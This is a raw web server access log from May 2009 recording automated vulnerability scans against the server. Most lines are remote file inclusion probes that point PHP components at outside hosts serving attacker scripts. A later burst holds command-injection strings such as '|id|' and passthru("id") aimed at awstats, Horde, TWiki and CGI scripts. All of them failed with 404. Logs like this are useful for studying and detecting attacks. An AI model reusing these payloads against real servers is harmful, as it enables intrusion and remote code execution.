218.38.243.71 - - [14/May/2009:09:06:23 -0500] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.beplanten.nl/administrator/components/com_virtuemart/1.txt???? HTTP/1.1" 404 315 "-""Mozilla/5.0"
218.38.243.71 - - [14/May/2009:09:06:24 -0500] "GET /logs/access_log.1239062400//include/print_category.php?setup[use_category]=1&dir=http://www.beplanten.nl/administrator/components/com_virtuemart/1.txt???? HTTP/1.1" 404 337 "-""Mozilla/5.0"
218.38.243.71 - - [14/May/2009:09:06:31 -0500] "GET //include/print_category.php?setup[use_category]=1&dir=http://www.beplanten.nl/administrator/components/com_virtuemart/1.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
121.165.73.157 - - [14/May/2009:09:08:35 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.gdiscount.fr///modules/ab.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
121.165.73.157 - - [14/May/2009:09:08:35 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.gdiscount.fr///modules/ab.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
121.165.73.157 - - [14/May/2009:09:08:35 -0500] "GET //skin/zero_vote/error.php?dir=http://www.gdiscount.fr///modules/ab.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
121.165.73.157 - - [14/May/2009:09:08:35 -0500] "GET //skin/zero_vote/error.php?dir=http://www.gdiscount.fr///modules/ab.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
72.30.142.152 - - [14/May/2009:09:15:31 -0500] "GET /robots.txt HTTP/1.0" 404 281 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.142.152 - - [14/May/2009:09:15:31 -0500] "GET /logs/access_log.1228608000 HTTP/1.0" 200 12125 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
84.32.195.2 - - [14/May/2009:09:17:19 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
84.32.195.2 - - [14/May/2009:09:17:19 -0500] "GET /logs/access_log.1239408000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
84.32.195.2 - - [14/May/2009:09:17:19 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
195.228.45.60 - - [14/May/2009:09:20:53 -0500] "GET /logs/sohoadmin/program/webmaster/product_update.php?_SESSION[docroot_path]=http://212.227.74.68/catalog/safe.txt? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
195.228.45.60 - - [14/May/2009:09:20:53 -0500] "GET /sohoadmin/program/webmaster/product_update.php?_SESSION[docroot_path]=http://212.227.74.68/catalog/safe.txt? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
195.228.45.60 - - [14/May/2009:09:20:58 -0500] "GET /logs/sohoadmin/program/webmaster/product_update.php?_SESSION[docroot_path]=http://212.227.74.68/catalog/a.txt? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
195.228.45.60 - - [14/May/2009:09:20:58 -0500] "GET /sohoadmin/program/webmaster/product_update.php?_SESSION[docroot_path]=http://212.227.74.68/catalog/a.txt? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
213.186.113.5 - - [14/May/2009:09:22:06 -0500] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.79"
213.186.113.5 - - [14/May/2009:09:22:06 -0500] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.79"
213.186.113.5 - - [14/May/2009:09:25:42 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 348 "-""libwww-perl/5.79"
213.186.113.5 - - [14/May/2009:09:25:42 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
213.186.113.5 - - [14/May/2009:09:28:27 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 332 "-""libwww-perl/5.79"
213.186.113.5 - - [14/May/2009:09:28:27 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
213.186.113.5 - - [14/May/2009:09:31:04 -0500] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
213.186.113.5 - - [14/May/2009:09:31:04 -0500] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
200.32.100.130 - - [14/May/2009:09:33:45 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
200.32.100.130 - - [14/May/2009:09:33:45 -0500] "GET /logs/access_log.1237161600//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 375 "-""Mozilla/5.0"
200.32.100.130 - - [14/May/2009:09:33:45 -0500] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
200.32.100.130 - - [14/May/2009:09:33:45 -0500] "GET /logs/access_log.1237420800//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 375 "-""Mozilla/5.0"
171.64.75.45 - - [14/May/2009:09:34:19 -0500] "GET /logs//send_reminders.php?noSet=0&includedir=http://www.maskany.com/idomila.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
171.64.75.45 - - [14/May/2009:09:34:19 -0500] "GET //send_reminders.php?noSet=0&includedir=http://www.maskany.com/idomila.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
171.64.75.45 - - [14/May/2009:09:34:19 -0500] "GET /logs//send_reminders.php?noSet=0&includedir=http://www.maskany.com/idomila.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
171.64.75.45 - - [14/May/2009:09:34:20 -0500] "GET //send_reminders.php?noSet=0&includedir=http://www.maskany.com/idomila.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
171.64.75.45 - - [14/May/2009:09:34:22 -0500] "GET /logs//send_reminders.php?noSet=0&includedir=http://www.maskany.com/idomila.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
171.64.75.45 - - [14/May/2009:09:34:22 -0500] "GET //send_reminders.php?noSet=0&includedir=http://www.maskany.com/idomila.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
171.64.75.45 - - [14/May/2009:09:34:22 -0500] "GET /logs//send_reminders.php?noSet=0&includedir=http://www.maskany.com/idomila.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
171.64.75.45 - - [14/May/2009:09:34:23 -0500] "GET //send_reminders.php?noSet=0&includedir=http://www.maskany.com/idomila.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
65.55.208.143 - - [14/May/2009:09:41:51 -0500] "GET /logs/access_log.1122768000 HTTP/1.1" 200 807 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
69.90.72.88 - - [14/May/2009:09:48:00 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
69.90.72.88 - - [14/May/2009:09:48:01 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
64.151.247.1 - - [14/May/2009:09:48:04 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.dasin.net/games/idoff1.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
64.151.247.1 - - [14/May/2009:09:48:04 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.dasin.net/games/idoff1.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
64.151.247.1 - - [14/May/2009:09:48:04 -0500] "GET /logs/access_log.1235606400//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.dasin.net/games/idoff1.txt??? HTTP/1.1" 404 372 "-""Mozilla/5.0"
69.90.72.88 - - [14/May/2009:09:51:17 -0500] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
69.90.72.88 - - [14/May/2009:09:51:17 -0500] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
69.90.72.88 - - [14/May/2009:09:52:16 -0500] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
69.90.72.88 - - [14/May/2009:09:52:16 -0500] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
67.225.245.33 - - [14/May/2009:09:53:27 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.dasin.net/games/idoff1.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
67.225.245.33 - - [14/May/2009:09:53:27 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.dasin.net/games/idoff1.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
67.225.245.33 - - [14/May/2009:09:53:27 -0500] "GET /logs/access_log.1235606400//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.dasin.net/games/idoff1.txt??? HTTP/1.1" 404 372 "-""Mozilla/5.0"
219.94.148.39 - - [14/May/2009:09:53:46 -0500] "GET /lostpasswd.php?env[include_prefix]=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
219.94.148.39 - - [14/May/2009:09:53:46 -0500] "GET /logs/access_log.1236643200/lostpasswd.php?env[include_prefix]=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
219.94.148.39 - - [14/May/2009:09:53:46 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
69.90.72.88 - - [14/May/2009:09:53:49 -0500] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
69.90.72.88 - - [14/May/2009:09:53:49 -0500] "GET //components/com_simpleboard/image_upload.php?sbp=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
69.90.72.88 - - [14/May/2009:09:54:04 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
69.90.72.88 - - [14/May/2009:09:54:04 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
219.94.148.39 - - [14/May/2009:09:54:10 -0500] "GET /logs/access_log.1236902400/lostpasswd.php?env[include_prefix]=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
69.90.72.88 - - [14/May/2009:09:54:23 -0500] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
69.90.72.88 - - [14/May/2009:09:54:23 -0500] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
195.5.168.93 - - [14/May/2009:09:55:07 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://free-merchant-account.investstores.com/id.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.825"
195.5.168.93 - - [14/May/2009:09:55:08 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://free-merchant-account.investstores.com/id.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.825"
195.5.168.93 - - [14/May/2009:09:55:13 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://free-merchant-account.investstores.com/id.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.825"
195.5.168.93 - - [14/May/2009:09:55:13 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://free-merchant-account.investstores.com/id.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.825"
124.0.54.98 - - [14/May/2009:09:56:07 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
124.0.54.98 - - [14/May/2009:09:56:07 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
124.0.54.98 - - [14/May/2009:09:56:07 -0500] "GET /logs/access_log.1239926400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
124.217.216.86 - - [14/May/2009:09:56:51 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.dasin.net/games/idoff1.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
124.217.216.86 - - [14/May/2009:09:56:51 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.dasin.net/games/idoff1.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
124.217.216.86 - - [14/May/2009:09:56:51 -0500] "GET /logs/access_log.1235606400//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.dasin.net/games/idoff1.txt??? HTTP/1.1" 404 372 "-""Mozilla/5.0"
124.217.216.86 - - [14/May/2009:09:56:59 -0500] "GET /logs/access_log.1237766400//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.dasin.net/games/idoff1.txt??? HTTP/1.1" 404 372 "-""Mozilla/5.0"
72.29.68.196 - - [14/May/2009:09:57:00 -0500] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
72.29.68.196 - - [14/May/2009:09:57:00 -0500] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
72.29.68.196 - - [14/May/2009:09:57:03 -0500] "GET /logs/access_log.1240099200/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
72.29.68.196 - - [14/May/2009:09:57:04 -0500] "GET /logs/access_log.1239235200/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
64.151.247.1 - - [14/May/2009:10:02:07 -0500] "GET /logs/access_log.1237766400//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.dasin.net/games/idoff1.txt??? HTTP/1.1" 404 372 "-""Mozilla/5.0"
84.32.195.2 - - [14/May/2009:10:02:51 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
84.32.195.2 - - [14/May/2009:10:02:51 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
84.32.195.2 - - [14/May/2009:10:02:51 -0500] "GET /logs/access_log.1239321600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
66.225.211.159 - - [14/May/2009:10:04:19 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.sysweb.it/user/copyright.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
66.225.211.159 - - [14/May/2009:10:04:19 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.sysweb.it/user/copyright.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
66.225.211.159 - - [14/May/2009:10:04:19 -0500] "GET /logs/access_log.1240185600//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.sysweb.it/user/copyright.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
66.225.211.159 - - [14/May/2009:10:04:20 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.sysweb.it/user/copyright.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
66.225.211.159 - - [14/May/2009:10:04:20 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.sysweb.it/user/copyright.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
66.225.211.159 - - [14/May/2009:10:04:20 -0500] "GET /logs/access_log.1240185600//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.sysweb.it/user/copyright.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
81.196.124.252 - - [14/May/2009:10:04:28 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://free-merchant-account.investstores.com/id.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
81.196.124.252 - - [14/May/2009:10:04:29 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://free-merchant-account.investstores.com/id.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
69.90.72.88 - - [14/May/2009:10:04:45 -0500] "GET /logs/akocomments.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
69.90.72.88 - - [14/May/2009:10:04:46 -0500] "GET /akocomments.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
66.225.211.159 - - [14/May/2009:10:04:51 -0500] "GET /logs/access_log.1239926400//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.sysweb.it/user/copyright.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
66.225.211.159 - - [14/May/2009:10:05:04 -0500] "GET /logs/access_log.1239926400//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.sysweb.it/user/copyright.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
81.196.124.252 - - [14/May/2009:10:05:13 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://free-merchant-account.investstores.com/id.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
81.196.124.252 - - [14/May/2009:10:05:14 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://free-merchant-account.investstores.com/id.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
69.90.72.88 - - [14/May/2009:10:05:40 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 351 "-""libwww-perl/5.805"
69.90.72.88 - - [14/May/2009:10:05:40 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 346 "-""libwww-perl/5.805"
212.59.11.66 - - [14/May/2009:10:05:48 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
212.59.11.66 - - [14/May/2009:10:05:48 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
212.59.11.66 - - [14/May/2009:10:05:48 -0500] "GET /logs/access_log.1239926400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
69.90.72.88 - - [14/May/2009:10:09:01 -0500] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
69.90.72.88 - - [14/May/2009:10:09:02 -0500] "GET //modules/agendax/addevent.inc.php?agendax_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
200.98.197.10 - - [14/May/2009:10:09:27 -0500] "GET /horde/services/help/?show=about&module=;%22.passthru(%22id%22); HTTP/1.1" 404 303 "-""libwww-perl/5.805"
200.98.197.10 - - [14/May/2009:10:09:28 -0500] "GET /cgi-bin/awstats.pl?configdir=%7Cecho%20;echo%20;id;echo%20;echo%20%7C HTTP/1.1" 404 301 "-""libwww-perl/5.805"
200.98.197.10 - - [14/May/2009:10:09:28 -0500] "GET /twiki/bin/configure?action=image;image=%7Cid%7C;type=text HTTP/1.1" 404 302 "-""libwww-perl/5.805"
200.98.197.10 - - [14/May/2009:10:09:28 -0500] "GET /technote/main.cgi/file.txt?down_num=953713356&board=my_board&command=down_load&filename=file.txt%7Cid%7C HTTP/1.1" 404 309 "-""libwww-perl/5.805"
200.98.197.10 - - [14/May/2009:10:09:29 -0500] "GET /cgi-bin/index.cgi?page=%7Cuname%20-a;id%7C HTTP/1.1" 404 300 "-""libwww-perl/5.805"
200.98.197.10 - - [14/May/2009:10:09:29 -0500] "GET /cgi-bin/acart/acart.pl?&page=%7Cuname%20-a;pwd;id%7C HTTP/1.1" 404 305 "-""libwww-perl/5.805"
200.98.197.10 - - [14/May/2009:10:09:30 -0500] "GET /cgi-bin/quikstore.cgi?category=%7Cid%7C HTTP/1.1" 404 304 "-""libwww-perl/5.805"
200.98.197.10 - - [14/May/2009:10:09:30 -0500] "GET /cgi-sys/guestbook.cgi?user=cpanel&template=%7Cid%7C HTTP/1.1" 404 304 "-""libwww-perl/5.805"
200.98.197.10 - - [14/May/2009:10:09:31 -0500] "GET /shop.pl/page=%7Cid%7C HTTP/1.1" 404 300 "-""libwww-perl/5.805"
200.98.197.10 - - [14/May/2009:10:09:31 -0500] "GET /cgi-bin/shop.pl/page=%7Cid%7C HTTP/1.1" 404 308 "-""libwww-perl/5.805"
200.98.197.10 - - [14/May/2009:10:09:31 -0500] "GET /store/shop.pl/page=%7Cid%7C HTTP/1.1" 404 306 "-""libwww-perl/5.805"
200.98.197.10 - - [14/May/2009:10:09:32 -0500] "GET /main.cgi/file.txt?down_num=953713356&board=my_board&command=down_load&filename=file.txt%7Cid%7C HTTP/1.1" 404 300 "-""libwww-perl/5.805"
200.98.197.10 - - [14/May/2009:10:09:32 -0500] "GET /services/help/?show=about&module=;%22.passthru(%22id%22); HTTP/1.1" 404 297 "-""libwww-perl/5.805"
200.98.197.10 - - [14/May/2009:10:09:33 -0500] "GET /cgi-bin/news.cgi?id=%7Cid%7C HTTP/1.1" 404 299 "-""libwww-perl/5.805"
200.98.197.10 - - [14/May/2009:10:09:33 -0500] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;id;%22 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
200.98.197.10 - - [14/May/2009:10:09:34 -0500] "GET /events.cgi?t=%7Cid%7C HTTP/1.1" 404 293 "-""libwww-perl/5.805"
200.98.197.10 - - [14/May/2009:10:09:34 -0500] "GET /awstats.pl?configdir=%7Cecho%20;echo%20;id;echo%20;echo%20%7C HTTP/1.1" 404 293 "-""libwww-perl/5.805"
121.165.73.157 - - [14/May/2009:10:10:58 -0500] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.gdiscount.fr///modules/ab.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
121.165.73.157 - - [14/May/2009:10:10:58 -0500] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.gdiscount.fr///modules/ab.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
69.90.72.88 - - [14/May/2009:10:13:52 -0500] "GET /logs/show.php?path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
